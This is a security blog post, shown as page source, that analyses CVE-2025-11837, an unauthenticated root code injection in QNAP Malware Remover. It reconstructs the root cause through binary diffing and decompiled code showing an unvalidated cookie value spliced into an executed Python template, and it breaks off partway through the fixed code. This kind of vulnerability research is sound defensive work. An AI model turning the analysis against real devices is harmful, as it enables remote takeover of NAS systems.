<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="dark">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover" />
<meta name="author" content="imjdl" />
<meta property="og:locale" content="en" />
<meta name="description" content="Background" />
<meta property="og:description" content="Background" />
<link rel="canonical" href="/posts/blog_cve_2025_11837_en/" />
<meta property="og:url" content="/posts/blog_cve_2025_11837_en/" />
<meta property="og:site_name" content="imjdl blog" />
<meta property="og:image" content="/assets/img/20260622/logo.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-06-22T12:34:00+08:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/img/20260622/logo.png" />
<meta property="twitter:title" content="CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover" />
<meta name="twitter:site" content="@Mortyjin" />
<meta name="twitter:creator" content="@MortyJin" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"imjdl","url":"https://github.com/imjdl/"},"dateModified":"2026-06-22T12:34:00+08:00","datePublished":"2026-06-22T12:34:00+08:00","description":"Background","headline":"CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover","image":"/assets/img/20260622/logo.png","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/blog_cve_2025_11837_en/"},"url":"/posts/blog_cve_2025_11837_en/"}</script>
<!-- End Jekyll SEO tag -->


  <title>CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover | imjdl blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="imjdl blog">
<meta name="application-name" content="imjdl blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js,npm/mermaid@11.4.0/dist/mermaid.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>


  <!-- MathJax -->
  <script async src="/assets/js/data/mathjax.js"></script>
  <script async src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6"></script>
  <script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-chtml.js"></script>


<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/log.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">imjdl blog</a>
    <p class="site-subtitle fst-italic mb-0">Perpetual student, continual incremental improvement.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/reading-list/" class="nav-link">
            <i class="fa-fw fa fa-list-alt"></i>
            

            <span>READING LIST</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    
      

      
        <a
          href="https://github.com/imjdl"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://twitter.com/Mortyjin"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-x-twitter"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['imelloit','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
      

      
        <a
          href="/feed.xml"
          aria-label="rss"
          

          

          

          
        >
          <i class="fas fa-rss"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1782102840"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jun 22, 2026
</time>

      </span>

      <!-- lastmod date -->
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/20260622/logo.png" class="popup img-link preview-img shimmer"><img src="/assets/img/20260622/logo.png"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/imjdl/">imjdl</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2709 words"
>
  <em>15 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">CVE-2025-11837 Deep Dive Python Code Injection Vulnerability in QNAP Malware Remover</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h2 id="background"><span class="me-2">Background</span><a href="#background" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CVE-2025-11837 affects QNAP Malware Remover. It carries a CVSS 9.8 score and is tagged as network-reachable, no authentication required, no user interaction. The vulnerability was first demonstrated at Pwn2Own Ireland 2025 and subsequently fixed by QNAP in advisory QSA-25-47, with the fixed version being Malware Remover 6.6.8.20251023. The advisory provides only three pieces of technical information: CWE-94 (code injection), the affected version range, and the fixed version — no PoC, no root-cause analysis, no vulnerability localization. For a CVSS 9.8 unauthenticated RCE, the public record is essentially blank beyond the advisory description.</p>

<p>It is worth noting that this is not the first injection issue in Malware Remover. QSA-21-16, published in 2021, was a command injection in the same component. The same component, the same class of problem, recurring years later. Whether this is a recurrence of the old issue or a new injection form cannot be determined from the advisory alone and requires further analysis.</p>

<p>This post documents the process of locating, reconstructing, and verifying the root cause, starting from two QPKG builds.</p>

<h2 id="summary"><span class="me-2">Summary</span><a href="#summary" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ul>
  <li><strong>Vulnerability Type:</strong> <code class="language-plaintext highlighter-rouge">malware_remover.cgi</code> concatenates an HTTP Cookie value into a Python source template without validation, then executes the resulting script with <code class="language-plaintext highlighter-rouge">python -c</code> — Python code injection (CWE-94)</li>
  <li><strong>Exploitation:</strong> No valid session required; a single HTTP request triggers it, and authentication itself is bypassable</li>
  <li><strong>Impact:</strong> Unauthenticated remote code execution, process privileges <code class="language-plaintext highlighter-rouge">uid=0</code> (root)</li>
  <li><strong>Prerequisites:</strong> Network reachability only — no credentials, no user interaction</li>
  <li><strong>Fix:</strong> 6.6.8 adds a length check (≤32) and an <code class="language-plaintext highlighter-rouge">isalnum</code> whitelist on the cookie value before concatenation</li>
</ul>

<h2 id="environment-setup"><span class="me-2">Environment Setup</span><a href="#environment-setup" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>The analysis environment is based on QNAP’s virtualized edition QuTScloud (c5.1.7.2739). Two versions of Malware Remover are used for vulnerability reproduction and fix comparison:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Component</th>
      <th>Version</th>
      <th>File</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>QuTScloud</td>
      <td>c5.1.7.2739</td>
      <td><code class="language-plaintext highlighter-rouge">QuTScloud_c5.1.7.2739.ova.zip</code></td>
    </tr>
    <tr>
      <td>Malware Remover (vulnerable)</td>
      <td>6.6.7.20250813_093505</td>
      <td><code class="language-plaintext highlighter-rouge">MalwareRemover-6.6.7.20250813_093505-x86_64.zip</code></td>
    </tr>
    <tr>
      <td>Malware Remover (fixed)</td>
      <td>6.6.8.20251023_151451</td>
      <td><code class="language-plaintext highlighter-rouge">MalwareRemover-6.6.8.20251023_151451-x86_64.zip</code></td>
    </tr>
  </tbody>
</table></div>

<p>The setup steps are as follows:</p>

<ol>
  <li>Extract <code class="language-plaintext highlighter-rouge">QuTScloud_c5.1.7.2739.ova.zip</code> to obtain the OVA virtual machine image.</li>
  <li>Import the OVA into a virtual machine hypervisor (VirtualBox / VMware, etc.).</li>
  <li>Start the virtual machine, complete the QuTScloud initialization, and confirm that the NAS environment is running and the web management interface is accessible.</li>
  <li>Import the Malware Remover installation package into the virtual machine via App Center. Since a two-version comparison is required, the vulnerable version (6.6.7) and the fixed version (6.6.8) are installed in turn.</li>
</ol>

<p><a href="/assets/img/20260622/20260701-152337.jpg" class="popup img-link  shimmer"><img src="/assets/img/20260622/20260701-152337.jpg" alt="" loading="lazy"></a></p>

<p><a href="/assets/img/20260622/20260701-152331.jpg" class="popup img-link  shimmer"><img src="/assets/img/20260622/20260701-152331.jpg" alt="" loading="lazy"></a></p>

<h2 id="sample-and-attack-surface"><span class="me-2">Sample and Attack Surface</span><a href="#sample-and-attack-surface" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Both versions are complete QNAP QPKG packages with identical structure:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>MalwareRemover/
├── MalwareRemover-6.6.7/    ← vulnerable version
└── MalwareRemover-6.6.8/    ← fixed version
</pre></td></tr></tbody></table></code></div></div>

<p>Each package contains three categories of files:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">www/malware_remover.cgi</code> — C++ compiled CGI binary, the HTTP entry point</li>
  <li><code class="language-plaintext highlighter-rouge">modules/*.pyc</code> — Python 2.7 bytecode, business logic</li>
  <li><code class="language-plaintext highlighter-rouge">MalwareRemover_exec</code> / <code class="language-plaintext highlighter-rouge">MalwareRemover_scan</code> — shc-packed auxiliary binaries</li>
</ul>

<p>The attack surface exposed in the Apache config:</p>

<div class="language-apache highlighter-rouge"><div class="code-header">
        <span data-label-text="Apache"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nc">Alias</span> /malware_remover "/home/httpd/cgi-bin/qpkg/MalwareRemover"
<span class="nc">RewriteRule</span> "^scan/status/?"  "malware_remover.cgi?action=status"
<span class="nc">RewriteRule</span> "^scan/start/?"   "malware_remover.cgi?action=scan"
</pre></td></tr></tbody></table></code></div></div>

<p>The CGI dispatches on the <code class="language-plaintext highlighter-rouge">action</code> parameter: <code class="language-plaintext highlighter-rouge">status</code>, <code class="language-plaintext highlighter-rouge">scan</code>, <code class="language-plaintext highlighter-rouge">stop</code>, <code class="language-plaintext highlighter-rouge">setting</code>, <code class="language-plaintext highlighter-rouge">background_task</code>, <code class="language-plaintext highlighter-rouge">about</code>, <code class="language-plaintext highlighter-rouge">system_status</code>. Every rewrite rule, shell script, and <code class="language-plaintext highlighter-rouge">.default</code> template is byte-for-byte identical between the two versions. The difference lies entirely inside the binaries.</p>

<h2 id="plaintext-resource-comparison"><span class="me-2">Plaintext Resource Comparison</span><a href="#plaintext-resource-comparison" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>With two firmware builds in hand, the first step is to compress the diff scope by elimination rather than decompiling directly. Comparing every plaintext resource:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>File</th>
      <th>Result</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">common.sh</code></td>
      <td>identical</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">MalwareRemover.sh</code></td>
      <td>identical</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">apache-malware_remover.conf</code></td>
      <td>identical</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">modules/default/*.default</code></td>
      <td>identical</td>
    </tr>
  </tbody>
</table></div>

<p>Zero differences in plaintext resources. The difference lies inside <code class="language-plaintext highlighter-rouge">malware_remover.cgi</code> or the <code class="language-plaintext highlighter-rouge">.pyc</code> files. The next step is a direct ELF import-table diff between the two binaries.</p>

<h2 id="import-table-diff"><span class="me-2">Import-Table Diff</span><a href="#import-table-diff" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Comparing the ELF import symbol tables of both <code class="language-plaintext highlighter-rouge">malware_remover.cgi</code> builds, looking for added or removed library functions. The only change across the entire import table:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>6.6.7: no isalnum
6.6.8: isalnum@@GLIBC_2.2.5 (extern @ 0x21a998)  ← only addition
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/20260622/20260701-152324.jpg" class="popup img-link  shimmer"><img src="/assets/img/20260622/20260701-152324.jpg" alt="" loading="lazy"></a></p>

<p>Function count went from 384 to 386, and <code class="language-plaintext highlighter-rouge">isalnum</code> is the only business-relevant addition. Functions like <code class="language-plaintext highlighter-rouge">execvp</code>, <code class="language-plaintext highlighter-rouge">fork</code>, <code class="language-plaintext highlighter-rouge">pipe</code>, <code class="language-plaintext highlighter-rouge">dup2</code>, <code class="language-plaintext highlighter-rouge">sprintf</code>, <code class="language-plaintext highlighter-rouge">regcomp</code>, <code class="language-plaintext highlighter-rouge">regexec</code> are identical across both versions.</p>

<p>Based on this single fact, the vulnerability can be classified:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">isalnum</code> is a character whitelist, equivalent to <code class="language-plaintext highlighter-rouge">[A-Za-z0-9]</code></li>
  <li>The canonical fix for CWE-94 is “validate external input before executing it”</li>
  <li><code class="language-plaintext highlighter-rouge">execvp</code>/<code class="language-plaintext highlighter-rouge">fork</code> are still present in both versions, so command execution was not removed — a filter was added <strong>before the call</strong></li>
</ul>

<p>The conclusion: the fix adds an <code class="language-plaintext highlighter-rouge">isalnum</code> whitelist on some external input to block code injection. Which input, into what, and how it executes — that requires further analysis.</p>

<h2 id="fix-localization"><span class="me-2">Fix Localization</span><a href="#fix-localization" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p><code class="language-plaintext highlighter-rouge">isalnum</code> is a newly added symbol, so its caller is where the fix lands. Tracing cross-references to the symbol:</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="c1"># xrefs to the isalnum PLT thunk
</span><span class="nf">xref_query</span><span class="p">(</span><span class="n">addr</span><span class="o">=</span><span class="mh">0x3330</span><span class="p">,</span> <span class="n">direction</span><span class="o">=</span><span class="sh">"</span><span class="s">to</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># → single caller: main @ 0x3a8d
</span>
<span class="c1"># also check execvp's callers
</span><span class="nf">xref_query</span><span class="p">(</span><span class="n">addr</span><span class="o">=</span><span class="mh">0x2e80</span><span class="p">,</span> <span class="n">direction</span><span class="o">=</span><span class="sh">"</span><span class="s">to</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># → single caller: popen_pipeline_exec @ 0x687c
</span></pre></td></tr></tbody></table></code></div></div>

<p><code class="language-plaintext highlighter-rouge">isalnum</code> has exactly one call site in all of 6.6.8, inside <code class="language-plaintext highlighter-rouge">main</code> at <code class="language-plaintext highlighter-rouge">0x3a8d</code>. <code class="language-plaintext highlighter-rouge">execvp</code> is only called from a self-implemented popen-style executor. The fix therefore sits in <code class="language-plaintext highlighter-rouge">main</code> and relates to that executor’s call chain.</p>

<p>The relevant functions are renamed in the IDB for clarity in subsequent analysis:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>sub_9570 → popen_pipeline_exec       (popen-style command executor)
sub_66F0 → popen_child_dup2_execvp   (child: dup2 + execvp)
main     → main_CVE_2025_11837_fixed (6.6.8) / _vulnerable (6.6.7)
</pre></td></tr></tbody></table></code></div></div>

<h2 id="decompilation-diff-cookie-handling-logic"><span class="me-2">Decompilation Diff: Cookie Handling Logic</span><a href="#decompilation-diff-cookie-handling-logic" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Decompiling both versions of <code class="language-plaintext highlighter-rouge">main</code> and comparing the loop that calls <code class="language-plaintext highlighter-rouge">isalnum</code>. This loop handles HTTP cookies.</p>

<p>Vulnerable 6.6.7 (cookie handling @ <code class="language-plaintext highlighter-rouge">0x3b01</code>):</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span data-label-text="C"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">v9</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v6</span><span class="p">;</span>                    <span class="c1">// cookie value, no validation</span>
    <span class="n">snprintf</span><span class="p">(</span><span class="n">v114</span><span class="p">,</span> <span class="mh">0x400</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">byte_21A9C0</span><span class="p">,</span> <span class="n">v75</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">v9</span><span class="p">);</span>  <span class="c1">// v9 concatenated directly</span>
    <span class="n">sub_9570</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="mi">64</span><span class="p">,</span> <span class="o">::</span><span class="n">dest</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">unk_16294</span><span class="p">,</span> <span class="n">v114</span><span class="p">,</span> <span class="p">...);</span>   <span class="c1">// execute v114</span>
    <span class="c1">// ...</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Fixed 6.6.8 (cookie handling @ <code class="language-plaintext highlighter-rouge">0x3a60</code>):</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span data-label-text="C"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td><td class="rouge-code"><pre><span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">v8</span> <span class="o">=</span> <span class="o">*</span><span class="n">v7</span><span class="p">;</span>                               <span class="c1">// cookie value</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">strlen</span><span class="p">(</span><span class="o">*</span><span class="n">v7</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mh">0x20</span><span class="p">)</span> <span class="p">{</span>              <span class="c1">// ① length check ≤ 32</span>
